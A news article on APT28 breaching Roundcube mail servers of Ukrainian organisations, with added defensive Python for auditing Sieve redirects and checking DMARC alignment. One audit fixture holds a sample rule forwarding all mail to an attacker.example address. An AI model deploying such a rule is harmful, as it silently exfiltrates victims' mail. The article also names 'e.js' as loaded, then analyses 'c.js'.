Hackers Compromised the Roundcube Email Servers of Ukrainian organizations

by Esmeralda McKenzie

APT28 (aka BlueDelta, Fancy Bear, Sednit, and Sofacy), a threat group linked to Russia’s GRU, hacked the Roundcube email servers of more than 40 Ukrainian organizations, including government bodies.

The cyber-espionage group used news about the Russia-Ukraine conflict to lure recipients into opening malicious emails. These emails exploited vulnerabilities in Roundcube Webmail to compromise unpatched servers.

After gaining unauthorized access to the email servers, the Russian military hackers used a malicious script to redirect the victims’ incoming emails to an email address controlled by the attackers.

The script was also used to:

  • Collect intelligence
  • Steal victims’ Roundcube address books
  • Steal session cookies
  • Steal other data from the Roundcube database
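The forwarding behaviour described above, a rule that silently copies a victim's incoming mail to an outside address, is something defenders can hunt for in the mailbox filters the webmail server stores. The audit below is an added example, not code from the article or from CERT-UA. It assumes the organisation uses Roundcube's managesieve plugin, so that per-user filters exist as Sieve scripts (RFC 5228), and it flags any `redirect` action whose target domain is not on an allow-list of the organisation's own domains. The Sieve scripts and the `INTERNAL_DOMAINS` value are constructed placeholders.

```python
import re

# Constructed sample Sieve scripts (not data from the incident): one benign
# filing rule, one external redirect of the kind a mail-forwarding implant
# would create, and one redirect that stays inside the organisation.
SAMPLE_SCRIPTS = {
    "alice": (
        'require ["fileinto"];\n'
        '# file newsletters away\n'
        'if header :contains "subject" "newsletter" { fileinto "News"; }\n'
    ),
    "bob": (
        'require ["copy"];\n'
        '# copies every incoming message to an outside mailbox\n'
        'redirect :copy "collector@attacker.example";\n'
    ),
    "carol": 'redirect "carol.archive@corp.example";\n',
}

# Placeholder for the organisation's own mail domains (assumption).
INTERNAL_DOMAINS = {"corp.example"}

# Sieve comments: "# ..." to end of line and "/* ... */" blocks.
COMMENT_RE = re.compile(r'/\*.*?\*/|#[^\n]*', re.DOTALL)
# "redirect", any tagged arguments such as :copy, then the quoted address.
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"', re.IGNORECASE)


def find_external_redirects(script, internal_domains):
    """Return the redirect targets in one Sieve script that leave the organisation."""
    cleaned = COMMENT_RE.sub("", script)
    external = []
    for match in REDIRECT_RE.finditer(cleaned):
        address = match.group(1)
        domain = address.rsplit("@", 1)[-1].lower()
        if domain not in internal_domains:
            external.append(address)
    return external


def audit_scripts(scripts, internal_domains):
    """Map each user who forwards mail externally to the offending target addresses."""
    findings = {}
    for user, script in scripts.items():
        hits = find_external_redirects(script, internal_domains)
        if hits:
            findings[user] = hits
    return findings


if __name__ == "__main__":
    for user, targets in audit_scripts(SAMPLE_SCRIPTS, INTERNAL_DOMAINS).items():
        print(f"{user}: forwards mail to {', '.join(targets)}")
```

Run against the real script store, the same check is cheap enough to schedule daily; a new external redirect appearing on an account that never had one is the alert, and the target address is the artefact to block and to search for across other mailboxes.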

The investigation by Ukraine’s CERT-UA and Recorded Future’s Insikt Group found that the campaign’s goal was to gather and steal military intelligence in support of Russia’s invasion of Ukraine.

The APT28 military hackers are believed to have been using the same infrastructure for these cyber-espionage attacks and other malicious activity since November 2021.

In addition, this GRU-linked group has also been accused of exploiting previously unknown zero-day vulnerabilities in Microsoft Outlook.

Investigation by Ukraine’s CERT-UA

During a detailed examination of the contents of a user’s mailbox, an email titled “News of Ukraine” was detected.

The key details of this email are:

  • Email received on 12.05.2023
  • Email received from ukraine_news@meta[.]ua
  • The email contained a lure article from the “NV” (nv.ua) news outlet.
  • The email contained an exploit for the Roundcube vulnerability CVE-2020-35730 (XSS).
  • The email contained JavaScript code for running the “q.js” and “e.js” files.

The “q.js” file contains an exploit for the Roundcube vulnerability tracked as CVE-2021-44026 (SQLi), which is used to extract data from the Roundcube database.

Analysis of the “c.js” code revealed that it contains an exploit for the CVE-2020-12641 vulnerability, which allows commands to be executed on the mail server.

Recommendations

The cybersecurity analysts offered the following recommendations:

  • Disable HTML and/or JavaScript in email attachments.
  • Use anti-spoofing and authentication mechanisms to filter incoming email traffic.
  • Keep security tools and systems up to date with the latest patches and updates.
  • Do not open attachments received from unknown senders.
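The second recommendation, anti-spoofing and authentication filtering, usually means acting on the SPF and DKIM results the inbound gateway already records and requiring that they align with the domain in the visible From header, which is what DMARC formalises. The filter below is an added example, not code from the article, CERT-UA or Roundcube. It parses an RFC 8601 `Authentication-Results` header that a trusted gateway is assumed to have written, and returns a DMARC-style verdict. The three sample messages are constructed; the sender address in the second one is the one the article reports, with the header results invented for illustration. Organizational-domain matching for relaxed alignment is simplified to the last two labels, where a real filter would consult the public suffix list.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Field patterns for an RFC 8601 Authentication-Results header.
RESULT_RE = re.compile(r'\b(spf|dkim)=(\w+)', re.IGNORECASE)
SPF_DOMAIN_RE = re.compile(r'smtp\.mailfrom=(?:[^@\s;]+@)?([^\s;]+)', re.IGNORECASE)
DKIM_DOMAIN_RE = re.compile(r'header\.d=([^\s;]+)', re.IGNORECASE)


def organizational_domain(domain):
    """Simplified relaxed-alignment key: keep the last two labels.
    A production filter would use the public suffix list instead (assumption)."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain, auth_domain, relaxed):
    """DMARC alignment: does the authenticated domain match the From domain?"""
    if not auth_domain:
        return False
    if relaxed:
        return organizational_domain(from_domain) == organizational_domain(auth_domain)
    return from_domain.lower() == auth_domain.lower()


def evaluate_alignment(raw_message, relaxed=True):
    """Return a DMARC-style verdict: the From domain must be backed by an
    aligned SPF pass or an aligned DKIM pass recorded by our own gateway."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1].lower()
    ar = " ".join(msg.get_all("Authentication-Results", []))
    results = {k.lower(): v.lower() for k, v in RESULT_RE.findall(ar)}
    spf_match = SPF_DOMAIN_RE.search(ar)
    dkim_match = DKIM_DOMAIN_RE.search(ar)
    spf_domain = spf_match.group(1) if spf_match else ""
    dkim_domain = dkim_match.group(1) if dkim_match else ""
    spf_ok = results.get("spf") == "pass" and aligned(from_domain, spf_domain, relaxed)
    dkim_ok = results.get("dkim") == "pass" and aligned(from_domain, dkim_domain, relaxed)
    return {
        "from_domain": from_domain,
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "dmarc_pass": spf_ok or dkim_ok,
    }


# Constructed sample messages (not captured traffic).
LEGIT = (
    "From: Alice <alice@corp.example>\n"
    "To: bob@corp.example\n"
    "Subject: Meeting notes\n"
    "Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=alice@corp.example;"
    " dkim=pass header.d=corp.example\n"
    "\n"
    "Notes attached.\n"
)

# Sender address as reported in the article; the authentication results are constructed.
SUSPECT = (
    "From: ukraine_news@meta.ua\n"
    "To: bob@corp.example\n"
    "Subject: News of Ukraine\n"
    "Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=bounce@unrelated.example;"
    " dkim=none\n"
    "\n"
    "Read the attached article.\n"
)

# A valid DKIM signature from a domain that does not match From: still fails DMARC.
UNALIGNED = (
    "From: Bob <bob@corp.example>\n"
    "To: alice@corp.example\n"
    "Subject: Invoice\n"
    "Authentication-Results: mx.corp.example; spf=none; dkim=pass header.d=unrelated.example\n"
    "\n"
    "Please pay.\n"
)

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT), ("suspect", SUSPECT), ("unaligned", UNALIGNED)):
        verdict = evaluate_alignment(raw)
        print(name, "PASS" if verdict["dmarc_pass"] else "FAIL", verdict)
```

The point the third sample makes is that a DKIM pass on its own is not a sender check: only an aligned pass ties the cryptographic result to the address the user actually sees, so a filter that quarantines on `dmarc_pass == False` catches lookalike and relayed lures that a plain "dkim=pass" rule would let through.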

Source credit : cybersecuritynews.com